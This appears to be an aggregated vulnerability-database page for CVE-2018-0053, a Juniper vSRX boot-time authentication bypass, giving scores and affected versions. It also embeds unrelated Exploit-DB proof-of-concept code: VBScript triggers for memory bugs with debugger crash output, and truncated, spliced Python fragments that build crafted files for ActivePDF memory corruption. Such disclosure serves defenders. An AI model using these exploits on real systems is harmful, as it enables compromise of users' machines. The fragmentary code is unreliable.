CVE-2018-0053
published 2018-10-10CVE-2018-0053: An authentication bypass vulnerability in the initial boot sequence of Juniper Networks Junos OS on vSRX Series may allow an attacker to gain full control of…
PriorityP431medium6.8CVSS 3.0
AVPACLPRNUINSUCHIHAH
EPSS
0.49%
39.4th percentile
An authentication bypass vulnerability in the initial boot sequence of Juniper Networks Junos OS on vSRX Series may allow an attacker to gain full control of the system without authentication when the system is initially booted up. Affected releases are Juniper Networks Junos OS: 15.1X49 versions prior to 15.1X49-D30 on vSRX.
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| juniper | junos | — | — |
| juniper | junos_os | — | — |
| juniper | srx_series | — | — |
| juniper_networks | junos_os | >= 15.1X49 < 15.1X49-D30 | 15.1X49-D30 |
CVSS provenance
nvdv3.06.8MEDIUMCVSS:3.0/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.2HIGHAV:L/AC:L/Au:N/C:C/I:C/A:C
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-3vrq-6257-h5x3: An authentication bypass vulnerability in the initial boot sequence of Juniper Networks Junos OS on vSRX Series may allow an attacker to gain full con
ghsa_unreviewed·2022-05-13
CVE-2018-0053 [HIGH] CWE-287 GHSA-3vrq-6257-h5x3: An authentication bypass vulnerability in the initial boot sequence of Juniper Networks Junos OS on vSRX Series may allow an attacker to gain full con
An authentication bypass vulnerability in the initial boot sequence of Juniper Networks Junos OS on vSRX Series may allow an attacker to gain full control of the system without authentication when the system is initially booted up. Affected releases are Juniper Networks Junos OS: 15.1X49 versions prior to 15.1X49-D30 on vSRX.
Juniper
CVE-2018-0053: An authentication bypass vulnerability in the initial boot sequence of Juniper Networks Junos OS on vSRX Series may allow an attacker to gain full con
vendor_juniper·2018-10-10·CVSS 6.8
CVE-2018-0053 [MEDIUM] CWE-287 CVE-2018-0053: An authentication bypass vulnerability in the initial boot sequence of Juniper Networks Junos OS on vSRX Series may allow an attacker to gain full con
CVE-2018-0053: An authentication bypass vulnerability in the initial boot sequence of Juniper Networks Junos OS on vSRX Series may allow an attacker to gain full control of the system without authentication when the system is initially booted up. Affected releases are Juniper Networks Junos OS: 15.1X49 versions prior to 15.1X49-D30 on vSRX.
No detection rules found.
Exploit-DB
VBScript - 'rtFilter' Out-of-Bounds Read
exploitdb·2018-11-30
CVE-2018-8552 VBScript - 'rtFilter' Out-of-Bounds Read
VBScript - 'rtFilter' Out-of-Bounds Read
---
On Error Resume Next
Class class1
Public Default Property Get x
ReDim arr(1)
End Property
End Class
set c = new class1
arr = Array("b", "b", "a", "a", c)
Call Filter(arr, "a")
r
eax=00000000 ebx=00000002 ecx=0d9d6fe0 edx=0d9cf000 esi=0d9cf000 edi=0d924ff6
eip=767d497b esp=09d2bcbc ebp=09d2bcc8 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
OLEAUT32!VariantCopy+0xb:
767d497b 0fb73e movzx edi,word ptr [esi] ds:002b:0d9cf000=????
0:007> k
# ChildEBP RetAddr
00 09d2bcc8 6f81b301 OLEAUT32!VariantCopy+0xb
01 09d2bd04 6f81b607 vbscript!rtFilter+0x183
02 09d2bd40 6f805407 vbscript!VbsFilter+0x128
03 09d2bd5c 6f80358d vbscript!StaticEntryPoint::Call+0x2f
04 09d2be74 6f805d5e vbscript!CScriptRuntime::Ru
Exploit-DB
VBScript - 'OLEAUT32!VariantClear' and 'scrrun!VBADictionary::put_Item' Use-After-Free
exploitdb·2018-11-30
CVE-2018-8544 VBScript - 'OLEAUT32!VariantClear' and 'scrrun!VBADictionary::put_Item' Use-After-Free
VBScript - 'OLEAUT32!VariantClear' and 'scrrun!VBADictionary::put_Item' Use-After-Free
---
Class class2
Private Sub Class_Terminate()
var17.RemoveAll
End Sub
End Class
Set var17 = CreateObject("Scripting.Dictionary")
Set var17.Item("foo") = new class2
var17.Item("foo") = 1
r
eax=00000000 ebx=00000009 ecx=0b93ffb8 edx=00a61078 esi=080e2fe8 edi=00000009
eip=759c3f3a esp=0a34b6bc ebp=0a34b6c8 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
OLEAUT32!VariantClear+0xdb:
759c3f3a 668906 mov word ptr [esi],ax ds:002b:080e2fe8=????
0:008> k
# ChildEBP RetAddr
00 0a34b6c8 7347329a OLEAUT32!VariantClear+0xdb
01 0a34b6e4 6b2d6ef5 IEShims!NS_ATLMitigation::APIHook_VariantClear+0x5d
02 0a34b72c 759dcc43 scrrun!VBADictionary::put_Item+0x7e
03 0a34b74c 75
Exploit-DB
ActivePDF Toolkit < 8.1.0.19023 - Multiple Memory Corruptions
exploitdb·2018-03-05·CVSS 9.8
CVE-2018-7264 [CRITICAL] ActivePDF Toolkit < 8.1.0.19023 - Multiple Memory Corruptions
ActivePDF Toolkit I", len(bodycontents)) + bodycontents
while (len(body) % 2) == 1:
body += "\x00"
base = 0x28147510
payload = pack("I", len(payload)) + payload
while (len(cmap) % 2) == 1:
cmap += "\x00"
outp = header + cmap + body
assert len(outp) >= 0x28
with open("test.iff", "wb") as f:
f.write(outp)
---
* Zoner Draw images (.zmf, .zbr)
---
#!/usr/bin/env python2
#
# eax=28151110 ebx=0000002e ecx=0000bc28 edx=2813eb10 esi=00000008
edi=028e0a6c
# eip=41414141 esp=2814550c ebp=41414141 iopl=0 nv up ei ng nz ac
pe cy
# cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b
efl=00010297
# 41414141 ?? ???
from struct import pack
header = pack("IIIIIII", 0x59A66A95, 0x100, 1, 8, 0, 2, 1)
base = 0x28141504
payload = "".ljust(0x28151124 - base, "\x00") + pack("I", len(payload)+1) + payload
wit
No writeups or analysis indexed.
2018-10-10
Published